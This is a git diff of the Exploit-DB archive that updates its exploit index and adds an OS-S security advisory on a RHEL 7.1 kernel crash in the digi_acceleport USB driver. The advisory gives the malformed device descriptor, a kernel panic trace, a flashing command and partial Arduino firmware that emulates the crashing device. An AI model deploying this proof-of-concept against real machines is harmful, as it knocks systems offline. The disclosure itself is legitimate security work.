PoC",2010-02-11,"fl0 fl0w",windows,dos,0 @@ -23062,7 +23062,7 @@ id,file,description,date,author,platform,type,port 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 -25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 +25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 @@ -29665,7 +29665,7 @@ id,file,description,date,author,platform,type,port 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0 -32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 +32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 @@ -29783,7 +29783,7 @@ id,file,description,date,author,platform,type,port 33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 -33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0 +33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0 @@ -30083,7 +30083,7 @@ id,file,description,date,author,platform,type,port 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0 -33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 +33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0 33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 @@ -30095,7 +30095,7 @@ id,file,description,date,author,platform,type,port 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 -33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0 +33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 @@ -34087,7 +34087,7 @@ id,file,description,date,author,platform,type,port 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 +37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0 37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0 @@ -35375,7 +35375,7 @@ id,file,description,date,author,platform,type,port 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0 -39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 +39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 @@ -35763,4 +35763,19 @@ id,file,description,date,author,platform,type,port 39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0 39524,platforms/php/webapps/39524.js,"ATutor LMS install_modules.php CSRF Remote Code Execution Vulnerability",2016-03-07,mr_me,php,webapps,0 39525,platforms/win64/local/39525.py,"Microsoft Windows - AFD.SYS Privilege Escalation (MS14-040) Win7x64",2016-03-07,"Rick Larabee",win64,local,0 +39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0 +39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0 +39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions <= 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 +39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 +39535,platforms/linux/local/39535.sh,"exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0 +39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 +39537,platforms/linux/dos/39537.txt,"Linux Kernel - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39538,platforms/linux/dos/39538.txt,"Linux Kernel - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0 +39539,platforms/linux/dos/39539.txt,"Linux Kernel - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39540,platforms/linux/dos/39540.txt,"Linux Kernel - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39542,platforms/linux/dos/39542.txt,"Linux Kernel - cypress_m8 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39541,platforms/linux/dos/39541.txt,"Linux Kernel - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39543,platforms/linux/dos/39543.txt,"Linux Kernel - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39544,platforms/linux/dos/39544.txt,"Linux Kernel - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 +39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 diff --git a/platforms/linux/dos/39537.txt b/platforms/linux/dos/39537.txt new file mode 100755 index 000000000..495c32b31 --- /dev/null +++ b/platforms/linux/dos/39537.txt @@ -0,0 +1,605 @@ +OS-S Security Advisory 2016-12 +Linux digi_acceleport Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: not yet assigned +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (digi_acceleport driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of advisory: https://os-s.net/advisories/OSS-2016-11_wacom.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device requiring the digi_acceleport driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x5c5 +idProduct: 0x2 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +The digi_acceleport driver does not use the num_ports (struct usb_serial) +value for any kind of sanity checks during the initialization process +(digi_port_init & digi_startup). Due to an incomplete sanity check, the driver +could try to dereference a null-pointer if a malformed device-descriptor is +presented (zero-value for bNumEndpoints or no described endpoint-descriptors). +This results in a crash of the system. + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x0 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x1 +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +To this day, no security patch was provided by the vendor. +Since our 90-day Responsible Discourse deadline is expired, we publish this +Security Advisory. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283378 + +Kernel Stacktrace: + +[ 39.946974] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 40.160503] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint +descriptors, different from the interface descriptor's value: 0 +[ 40.191627] usb 1-1: New USB device found, idVendor=05c5, idProduct=0002 +[ 40.200660] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 40.210919] usb 1-1: Product: Ä? +[ 40.216028] usb 1-1: Manufacturer: Ä? +[ 40.220047] usb 1-1: SerialNumber: % +[ 40.285649] usbcore: registered new interface driver digi_acceleport +[ 40.295629] usbserial: USB Serial support registered for Digi 2 port USB +adapter +[ 40.302062] usbserial: USB Serial support registered for Digi 4 port USB +adapter +[ 40.318968] digi_acceleport 1-1:1.0: Digi 2 port USB adapter converter +detected +[ 40.327158] BUG: unable to handle kernel NULL pointer dereference at +0000000000000268 +[ 40.328013] IP: [] __init_waitqueue_head+0xa/0x20 +[ 40.328013] PGD 0 +[ 40.328013] Oops: 0002 [#1] SMP +[ 40.328013] Modules linked in: digi_acceleport(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 40.328013] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 40.328013] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 40.328013] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 40.328013] RIP: 0010:[] [] +__init_waitqueue_head+0xa/0x20 +[ 40.328013] RSP: 0018:ffff88000bd23a30 EFLAGS: 00010282 +[ 40.328013] RAX: 0000000000000270 RBX: ffff88000af97d80 RCX: 0000000000000000 +[ 40.328013] RDX: ffffffffa03978f8 RSI: ffffffffa0396577 RDI: 0000000000000268 +[ 40.328013] RBP: ffff88000bd23a58 R08: 0000000000016440 R09: ffff88000e401800 +[ 40.328013] R10: ffffffffa039531a R11: ffff88000c3b9800 R12: 0000000000000000 +[ 40.328013] R13: 0000000000000003 R14: ffff88000af97840 R15: ffffffffa0397200 +[ 40.328013] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 40.328013] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 40.328013] CR2: 0000000000000268 CR3: 000000000cb80000 CR4: +00000000000006f0 +[ 40.328013] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 40.328013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 40.328013] Stack: +[ 40.328013] ffff88000bd23a58 ffffffffa03953bf ffff88000d685d00 ffff88000af97840 +[ 40.328013] ffff88000c525830 ffff88000bd23a80 ffffffffa0395464 ffff88000bd23a80 +[ 40.328013] ffff88000af97858 ffff88000af97858 ffff88000bd23c18 ffffffff8145fed1 +[ 40.328013] Call Trace: +[ 40.328013] [] ? digi_port_init+0xcf/0x100 [digi_acceleport] +[ 40.328013] [] digi_startup+0x54/0x98 [digi_acceleport] +[ 40.328013] [] usb_serial_probe+0xdb1/0x1230 +[ 40.328013] [] ? ida_get_new_above+0x7c/0x2a0 +[ 40.328013] [] ? kmem_cache_alloc+0x1ba/0x1d0 +[ 40.328013] [] ? sysfs_addrm_finish+0x42/0xe0 +[ 40.328013] [] ? __sysfs_add_one+0x61/0x100 +[ 40.328013] [] usb_probe_interface+0x1c4/0x2f0 +[ 40.328013] [] driver_probe_device+0x87/0x390 +[ 40.328013] [] __driver_attach+0x93/0xa0 +[ 40.328013] [] ? __device_attach+0x40/0x40 +[ 40.328013] [] bus_for_each_dev+0x73/0xc0 +[ 40.328013] [] driver_attach+0x1e/0x20 +[ 40.328013] [] usb_serial_register_drivers+0x29b/0x580 +[ 40.328013] [] ? 0xffffffffa0399fff +[ 40.328013] [] usb_serial_module_init+0x1e/0x1000 +[digi_acceleport] +[ 40.328013] [] do_one_initcall+0xb8/0x230 +[ 40.328013] [] load_module+0x133e/0x1b40 +[ 40.328013] [] ? ddebug_proc_write+0xf0/0xf0 +[ 40.328013] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 40.328013] [] SyS_finit_module+0xa6/0xd0 +[ 40.328013] [] system_call_fastpath+0x16/0x1b +[ 40.328013] Code: 00 48 c7 c7 50 32 d6 81 e8 74 38 57 00 e9 37 ff ff ff e8 5a +1a 57 00 e9 61 ff ff ff 0f 1f 44 00 00 0f 1f 44 00 00 55 48 8d 47 08 07 00 +00 00 00 48 89 e5 48 89 47 08 48 89 47 10 5d c3 0f 1f +[ 40.328013] RIP [] __init_waitqueue_head+0xa/0x20 +[ 40.328013] RSP +[ 40.328013] CR2: 0000000000000268 +[ 40.772818] ---[ end trace b239663354a1c556 ]--- +[ 40.778676] Kernel panic - not syncing: Fatal exception +[ 40.779642] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E +:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 